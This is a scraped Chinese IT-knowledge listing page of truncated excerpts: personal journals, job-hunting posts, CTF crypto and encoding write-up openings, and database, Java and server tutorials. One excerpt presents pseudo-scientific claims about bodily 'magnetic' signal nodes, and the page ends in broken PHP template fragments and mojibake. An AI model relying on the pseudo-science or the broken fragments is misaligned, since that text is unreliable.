文化通史121今日启发：Elton:第八章中世文化的初兴第一节幕府体制与公武二元文化的确立镰仓幕府在日本历史上，平安时代末期，出现平氏和源氏两大武士集团。首先平氏取代贵族而获得了政权，但仍沿袭贵族政治。平氏与源氏两大武士集团之间不断发生战争。源赖朝于1180年奉以仁王之旨令，举兵讨伐平氏，经过富士川、一谷、坛浦等战役，最终推翻了平氏政权。源赖朝夺取政权后，在地方领主的武力支持下，在镰仓地方初步建立
                    
                    
2022-11-17
                        珍惜dxz

                        
中原焦点团队网络初、中级28期杜小珍坚持分享第534天坚持读书第436天读《建构解决之道》收获:当情况变更糟时的可贵应对1.当情况变得更糟时，咨询师必须问明详情，了解让他们变差的情况与因素。咨询师需以尊重地态度倾听与接纳当事人描述一些突如其来的其他事件如何影响他们的生活，并多加援用“应对问句”，将会非常重要而有用。同时，咨询师还需要用开放的心去关注当事人在处理这些情境时，是否有与过去不同之处。2.
                    
                    
题解 | #完全数计算#不知道为什么没超时的暴力解法
                        huaxinjiayou
java
                        
兄弟们，坚持就是胜利啊，找工作从去年秋招就开始找，到五月底才收到第一个offer星环的，然后六月初t咋六月了还有面试啊，有兄弟了解这个部门吗面完了家人们，纯纯kpi啊，上来就是一道题是打印多个字符串的华为接头人话术指南：欲投华为，必看此贴!引流华为招聘提前批【奖】这个夏天，和牛牛一起打卡刷题~Java面试实战项目25届本科找暑期实习的历程飞猪旅行运营岗面经百度视觉算法一面面经感谢牛友们，腾子pcg
                    
                    
CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移
                        沧海一粟日尽其用
算法安全python
                        
CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移1.题目2.解题思路2.1base64编码原理2.2解题思路2.2.1base64解码找规律2.2.2破解思路3.解题脚本4.flag5.附EASCII码表1.题目提示信息：7+1+0？格式bugku{xxxxx}密文：4nXna/V7t2LpdLI44mn0fQ==要求：破解密文获得flag2.解题思路2.1base64
                    
                    
06月04日
                        或许你也这样想

                        
躺下来就已经是凌晨了，感觉真的很疲惫，还有好多好多被交代的任务没完成，大脑混乱眼皮也不听使唤耷拉下来，黑眼圈也不知道掉到哪里去了…只感觉一身的疲惫，作为一个心思敏感的职场小白我真的觉得这段时间身体是如此的煎熬精神是如此的压抑，晚上回来从八点多加班到十一点多，一整天都对着电脑脸也开始变得蜡黄剪了短发头发也油的更快了，说话也变得如此的小心翼翼，这应该是初入职场正常的状态吧，这个时候就愈发需要陪伴和沟通
                    
                    
《心毒》‖邪恶的人性好似一剂毒药
                        那花评书

                        
《心毒》是一部刑侦小说，作者初禾也是一位高人气原创作者，在她细腻的笔触之下，不论是小说情节还是人物都显得紧凑而饱满。本书分为两起案件，一起名为“红颜”，一起名为“知己”。第一案红颜中讲到，在某个城市边缘的穷人区发现一位女性受害者，她离奇又蹊跷的受害场景，让当时的办案人员都唏嘘不已，紧接着引出了本书的男主角花崇和柳至秦这对“柳暗花明”组合。看过刑侦小说的朋友都知道，接下来的情节就是侦破案件的过程，同
                    
                    
CTF常见编码及加解密（超全）第二篇
                        不会代码的小徐
编码密码网络安全密码学预编码
                        
HTML实体编码简述：字符实体是用一个编号写入HTML代码中来代替一个字符，在使用浏览器访问网页时会将这个编号解析还原为字符以供阅读。举例：highlighter-HTML明文：hello，world.十进制：hello，world.十六进制：hel
                    
                    
2023-09-15
                        莲子心茶

                        
小含因流感发烧四天都没上学，担心她跟不上，便提出18:00-18:30替她补半小时的课。可调节设备、课上互动，竟是讲到了7点半，后面我调控智能手表，竟到了21:30。再后来，学生肠胃炎打吊针，他妈妈说遇上学校的同学，也是同样再打吊针，便问：饭菜不是学校饭堂做的么，怎么我孩子说外边公司承包？饭堂为了能给扩大的声源提供场所，假期开始装修，至今还未完工。因此开学初是由公司外包的饭菜。我将这事报给了级长。
                    
                    
中原焦点团队 范利娜 焦点初16 坚持分享第1017天 2022-3-26约练78次
                        娜_2c8d

                        
家长培养孩子的最重要就是让孩于与我们保持独立，帮助他们成为一个独立的个体，有一天，当他们离开我们的时候，能自己独当一面。我们希望不要把孩子当成自己翻版或者延伸，而是一个独立的人，与我们有着不同性情，不同品味，不同感知、不同期望，不同梦想的个体。如何帮助他们成为一个自立的人？让他们自己做自己的事情，让他们亲自经历各种问题带来的挣扎，让他们在自己的错误中得到成长。
                    
                    
平平淡淡才是真——《菜根谭》读书笔记
                        云卷韵舒

                        
图片图片士君子之涉世，于人不可轻为喜怒，喜怒轻，则心腹肝胆皆为人所窥。于物不可重为爱憎。爱憎重，则意气精神悉为物所制。士大夫君子在世上，对人不能轻易流露自己的喜怒哀乐，否则，所有的心思都会被人看破；对世上万物，也不要过分喜欢或厌恶，否则，就会玩物丧志。心体澄澈，常在明镜止水之中，则天下自无可厌之事；意气和平，常在丽日光风之内，则天下自无可恶之人。如果心如明镜，世上就没有心烦之事；心态平和，世上就没
                    
                                
xml解析
                                    小猪猪08
xml
                                    
1、DOM解析的步奏 
准备工作： 
   1.创建DocumentBuilderFactory的对象 
   2.创建DocumentBuilder对象 
   3.通过DocumentBuilder对象的parse(String fileName)方法解析xml文件 
   4.通过Document的getElem
                                
                                
每个开发人员都需要了解的一个SQL技巧
                                    brotherlamp
linuxlinux视频linux教程linux自学linux资料
                                    
  
对于数据过滤而言CHECK约束已经算是相当不错了。然而它仍存在一些缺陷，比如说它们是应用到表上面的，但有的时候你可能希望指定一条约束，而它只在特定条件下才生效。 
使用SQL标准的WITH CHECK OPTION子句就能完成这点，至少Oracle和SQL Server都实现了这个功能。下面是实现方式： 
CREATE TABLE books ( 
  id &
                                
                                
Quartz——CronTrigger触发器
                                    eksliang
quartzCronTrigger
                                    
转载请出自出处：http://eksliang.iteye.com/blog/2208295 一.概述 
CronTrigger 能够提供比 SimpleTrigger 更有具体实际意义的调度方案，调度规则基于 Cron 表达式，CronTrigger 支持日历相关的重复时间间隔（比如每月第一个周一执行），而不是简单的周期时间间隔。 二.Cron表达式介绍 1）Cron表达式规则表 
Quartz
                                
                                
Informatica基础
                                    18289753290
InformaticaMonitormanagerworkflowDesigner
                                    
1. 
1）PowerCenter Designer：设计开发环境，定义源及目标数据结构；设计转换规则，生成ETL映射。 
2）Workflow  Manager：合理地实现复杂的ETL工作流，基于时间，事件的作业调度 
3）Workflow  Monitor：监控Workflow和Session运行情况，生成日志和报告 
4）Repository  Manager：
                                
                                
linux下为程序创建启动和关闭的的sh文件，scrapyd为例
                                    酷的飞上天空
scrapy
                                    
对于一些未提供service管理的程序  每次启动和关闭都要加上全部路径，想到可以做一个简单的启动和关闭控制的文件 
  
下面以scrapy启动server为例，文件名为run.sh： 
  
  
#端口号，根据此端口号确定PID
PORT=6800
#启动命令所在目录
HOME='/home/jmscra/scrapy/'

#查询出监听了PORT端口
                                
                                
人--自私与无私
                                    永夜-极光

                                    
            今天上毛概课,老师提出一个问题--人是自私的还是无私的,根源是什么? 
  
            从客观的角度来看,人有自私的行为,也有无私的
                                
                                
Ubuntu安装NS-3 环境脚本
                                    随便小屋
ubuntu
                                    
  
将附件下载下来之后解压，将解压后的文件ns3environment.sh复制到下载目录下（其实放在哪里都可以，就是为了和我下面的命令相统一）。输入命令： 
  
sudo ./ns3environment.sh >>result 
  
这样系统就自动安装ns3的环境，运行的结果在result文件中，如果提示 
  
  
com
                                
                                
创业的简单感受
                                    aijuans
创业的简单感受
                                    
  
       2009年11月9日我进入a公司实习，2012年4月26日，我离开a公司，开始自己的创业之旅。 
     今天是2012年5月30日，我忽然很想谈谈自己创业一个月的感受。 
当初离开边锋时，我就对自己说：“自己选择的路，就是跪着也要把他走完”，我也做好了心理准备，准备迎接一次次的困难。我这次走出来，不管成败
                                
                                
如何经营自己的独立人脉
                                    aoyouzi
如何经营自己的独立人脉
                                    
独立人脉不是父母、亲戚的人脉，而是自己主动投入构造的人脉圈。“放长线，钓大鱼”，先行投入才能产生后续产出。       现在几乎做所有的事情都需要人脉。以银行柜员为例，需要拉储户，而其本质就是社会人脉，就是社交！很多人都说，人脉我不行，因为我爸不行、我妈不行、我姨不行、我舅不行……我谁谁谁都不行，怎么能建立人脉？我这里说的人脉，是你的独立人脉。       以一个普通的银行柜员
                                
                                
JSP基础
                                    百合不是茶
jsp注释隐式对象
                                    
  
1,JSP语句的声明 
<%! 声明 %> 　　    声明：这个就是提供java代码声明变量、方法等的场所。

表达式 <%= 表达式 %> 　　   这个相当于赋值，可以在页面上显示表达式的结果，

程序代码段/小型指令　<% 程序代码片段 %>  
  
2,JSP的注释 
  
 <!-- --> 
                                
                                
web.xml之session-config、mime-mapping
                                    bijian1013
javaweb.xmlservletsession-configmime-mapping
                                    
session-config 
1.定义： 
<session-config>
 <session-timeout>20</session-timeout>
</session-config> 
2.作用：用于定义整个WEB站点session的有效期限，单位是分钟。 
  
mime-mapping 
1.定义： 
<mime-m
                                
                                
互联网开放平台（1）
                                    Bill_chen
互联网qq新浪微博百度腾讯
                                    
现在各互联网公司都推出了自己的开放平台供用户创造自己的应用，互联网的开放技术欣欣向荣，自己总结如下： 
1.淘宝开放平台(TOP) 
网址：http://open.taobao.com/ 
依赖淘宝强大的电子商务数据，将淘宝内部业务数据作为API开放出去，同时将外部ISV的应用引入进来。 
目前TOP的三条主线： 
TOP访问网站：open.taobao.com 
ISV后台：my.open.ta
                                
                                
【MongoDB学习笔记九】MongoDB索引
                                    bit1129
mongodb
                                    
索引 
 
 可以在任意列上建立索引 
 索引的构造和使用与传统关系型数据库几乎一样,适用于Oracle的索引优化技巧也适用于Mongodb 
 使用索引可以加快查询,但同时会降低修改,插入等的性能 
 内嵌文档照样可以建立使用索引 
 测试数据 
  
  
var p1 = {
"name":"Jack",
"age&q
                                
                                
JDBC常用API之外的总结
                                    白糖_
jdbc
                                    
 做JAVA的人玩JDBC肯定已经很熟练了，像DriverManager、Connection、ResultSet、Statement这些基本类大家肯定很常用啦，我不赘述那些诸如注册JDBC驱动、创建连接、获取数据集的API了，在这我介绍一些写框架时常用的API，大家共同学习吧。 
  
  
 
 ResultSetMetaData获取ResultSet对象的元数据信息 
 
                                
                                
apache VelocityEngine使用记录
                                    bozch
VelocityEngine
                                    
VelocityEngine是一个模板引擎，能够基于模板生成指定的文件代码。 
  
使用方法如下： 
    VelocityEngine engine = new VelocityEngine();// 定义模板引擎 
    Properties properties = new Properties();// 模板引擎属
                                
                                
编程之美-快速找出故障机器
                                    bylijinnan
编程之美
                                    

package beautyOfCoding;

import java.util.Arrays;

public class TheLostID {

	/*编程之美 
	 假设一个机器仅存储一个标号为ID的记录，假设机器总量在10亿以下且ID是小于10亿的整数，假设每份数据保存两个备份，这样就有两个机器存储了同样的数据。
		1.假设在某个时间得到一个数据文件ID的列表，是
                                
                                
关于Java中redirect与forward的区别
                                    chenbowen00
javaservlet
                                    
在Servlet中两种实现： 
 
forward方式：request.getRequestDispatcher(“/somePage.jsp”).forward(request, response); 
 
redirect方式：response.sendRedirect(“/somePage.jsp”); 
 
forward是服务器内部重定向，程序收到请求后重新定向到另一个程序，客户机并不知
                                
                                
[信号与系统]人体最关键的两个信号节点
                                    comsci
系统
                                    
 
 
 
        如果把人体看做是一个带生物磁场的导体,那么这个导体有两个很重要的节点,第一个在头部,中医的名称叫做 百汇穴, 另外一个节点在腰部,中医的名称叫做 命门 
 
        如果要保护自己的脑部磁场不受到外界有害信号的攻击,最简单的
                                
                                
oracle 存储过程执行权限
                                    daizj
oracle存储过程权限执行者调用者
                                    
在数据库系统中存储过程是必不可少的利器，存储过程是预先编译好的为实现一个复杂功能的一段Sql语句集合。它的优点我就不多说了，说一下我碰到的问题吧。我在项目开发的过程中需要用存储过程来实现一个功能，其中涉及到判断一张表是否已经建立，没有建立就由存储过程来建立这张表。 
 
CREATE OR REPLACE PROCEDURE TestProc  
IS  
  fla
                                
                                
为mysql数据库建立索引
                                    dengkane
mysql性能索引
                                    
前些时候，一位颇高级的程序员居然问我什么叫做索引，令我感到十分的惊奇，我想这绝不会是沧海一粟，因为有成千上万的开发者（可能大部分是使用MySQL的）都没有受过有关数据库的正规培训，尽管他们都为客户做过一些开发，但却对如何为数据库建立适当的索引所知较少，因此我起了写一篇相关文章的念头。  最普通的情况，是为出现在where子句的字段建一个索引。为方便讲述，我们先建立一个如下的表。
                                
                                
学习C语言常见误区 如何看懂一个程序 如何掌握一个程序以及几个小题目示例
                                    dcj3sjt126com
c算法
                                    
如果看懂一个程序，分三步 
  
1、流程 
  
2、每个语句的功能 
  
3、试数 
  
如何学习一些小算法的程序 
尝试自己去编程解决它，大部分人都自己无法解决 
如果解决不了就看答案 
关键是把答案看懂，这个是要花很大的精力，也是我们学习的重点 
看懂之后尝试自己去修改程序，并且知道修改之后程序的不同输出结果的含义 
照着答案去敲 
调试错误 

                                
                                
centos6.3安装php5.4报错
                                    dcj3sjt126com
centos6
                                    
报错内容如下: 
Resolving Dependencies 
--> Running transaction check 
---> Package php54w.x86_64 0:5.4.38-1.w6 will be installed 
--> Processing Dependency: php54w-common(x86-64) = 5.4.38-1.w6 for 
                                
                                
JSONP请求
                                    flyer0126
jsonp
                                    
  
    使用jsonp不能发起POST请求。 
It is not possible to make a JSONP POST request.
JSONP works by creating a <script> tag that executes Javascript from a different domain; it is not pos
                                
                                
Spring Security（03）——核心类简介
                                    234390216
Authentication
                                    
核心类简介 
目录 
1.1     Authentication 
1.2     SecurityContextHolder 
1.3     AuthenticationManager和AuthenticationProvider 
1.3.1  &nb
                                
                                
在CentOS上部署JAVA服务
                                    java--hhf
javajdkcentosJava服务
                                    
    本文将介绍如何在CentOS上运行Java Web服务，其中将包括如何搭建JAVA运行环境、如何开启端口号、如何使得服务在命令执行窗口关闭后依旧运行 
    
第一步：卸载旧Linux自带的JDK 
①查看本机JDK版本 
java -version 
   结果如下 
java version "1.6.0"
                                
                                
oracle、sqlserver、mysql常用函数对比[to_char、to_number、to_date]
                                    ldzyz007
oraclemysqlSQL Server
                                    
oracle                                &n
                                
                                
记Protocol Oriented Programming in Swift of WWDC 2015
                                    ningandjin
protocolWWDC 2015Swift2.0
                                    
其实最先朋友让我就这个题目写篇文章的时候，我是拒绝的，因为觉得苹果就是在炒冷饭， 把已经流行了数十年的OOP中的“面向接口编程”还拿来讲，看完整个Session之后呢，虽然还是觉得在炒冷饭，但是毕竟还是加了蛋的，有些东西还是值得说说的。 
 
通常谈到面向接口编程，其主要作用是把系统设计和具体实现分离开，让系统的每个部分都可以在不影响别的部分的情况下，改变自身的具体实现。接口的设计就反映了系统
                                
                                
搭建 CentOS 6 服务器(15) - Keepalived、HAProxy、LVS
                                    rensanning
keepalived
                                    
（一）Keepalived 
 
（1）安装 
 
# cd /usr/local/src
# wget http://www.keepalived.org/software/keepalived-1.2.15.tar.gz
# tar zxvf keepalived-1.2.15.tar.gz
# cd keepalived-1.2.15
# ./configure
# make &a
                                
                                
ORACLE数据库SCN和时间的互相转换
                                    tomcat_oracle
oraclesql
                                    
SCN（System Change Number 简称 SCN）是当Oracle数据库更新后，由DBMS自动维护去累积递增的一个数字，可以理解成ORACLE数据库的时间戳，从ORACLE 10G开始，提供了函数可以实现SCN和时间进行相互转换；  　　 
用途：在进行数据库的还原和利用数据库的闪回功能时，进行SCN和时间的转换就变的非常必要了；   　 
　操作方法：   　　1、通过dbms_f
                                
                                
Spring MVC 方法注解拦截器
                                    xp9802
spring mvc
                                    
应用场景，在方法级别对本次调用进行鉴权，如api接口中有个用户唯一标示accessToken,对于有accessToken的每次请求可以在方法加一个拦截器，获得本次请求的用户，存放到request或者session域。 
python中，之前在python flask中可以使用装饰器来对方法进行预处理，进行权限处理 
先看一个实例,使用@access_required拦截：    
?      
                                
                
            
        
    

    

        

            按字母分类：
            ABCDEFGHIJKLMNOPQRSTUVWXYZ其他
        
    

    

        

            首页 -
            关于我们 -
            站内搜索 -
            Sitemap -
            侵权投诉
        
        
版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.

        
    

          

            
              
' . htmlentities($func) . '
        
          
Opt
          

              
              

                  
                  
' . htmlentities($value) . '
            
              
. htmlentities($filename) . '">涓嬭浇 / 鍒犻櫎